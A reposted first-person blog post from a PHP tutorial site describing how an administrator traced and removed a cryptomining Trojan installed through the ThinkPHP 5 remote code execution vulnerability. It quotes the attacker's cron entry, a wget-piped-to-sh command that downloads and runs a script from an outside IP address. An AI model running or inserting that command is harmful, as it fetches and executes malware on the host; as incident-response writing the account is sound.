Home >PHP Framework >ThinkPHP >Trojan removal experience: Dealing with a Trojan that exploited thinkphp5 remote code execution vulnerability

Trojan removal experience: Dealing with a Trojan that exploited thinkphp5 remote code execution vulnerability

藏色散人
藏色散人forward
2021-04-06 14:13:402783browse

The following tutorial column of thinkphp will introduce to you how to deal with a Trojan that exploits thinkphp5 remote code execution vulnerability. I hope it will be helpful to friends in need!

Trojan removal experience: Dealing with a Trojan that exploited thinkphp5 remote code execution vulnerability

Remember the experience of removing a Trojan horse: dealing with a Trojan horse that exploited the thinkphp5 remote code execution vulnerability

Yesterday I discovered that a server was suddenly slow The top shows that more than 100% of the CPU usage of several processes is

The execution command is:

/tmp/php  -s /tmp/p2.conf

It is basically certain that it has been hung

The next step is to determine the source

last No login record

Kill these processes first, but they appear again after a few minutes

Let’s see what this Trojan wants to do first

netstat See This Trojan opened a port and established a connection with a certain IP abroad

But tcpdump did not find any data transfer for a while

What did he want to do?

Continue to check the log

I found in the cron log that the www user has a crontab timing operation, which is basically the problem

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

I downloaded a few problems and took a look. It seems to be a mining Trojan program

The www user on the server was created by installing lnmp. Looking at the source, it is probably a web vulnerability.

Look at the permissions of php under /tmp is www

Check the logs of several sites under lnmp and find that it is using the remote code execution vulnerability recently exposed in thinkphp 5

Vulnerability details: https://nosec.org/home/detail/2050.html

Fix the problem and solve it

But this site is a test site and the port listening is 8083. Could it be that hackers are now Can you start sniffing unconventional ports?

Source: https://www.simapple.com/425.html

Related recommendations: The latest 10 thinkphp video tutorials

The above is the detailed content of Trojan removal experience: Dealing with a Trojan that exploited thinkphp5 remote code execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:simapple. If there is any infringement, please contact admin@php.cn delete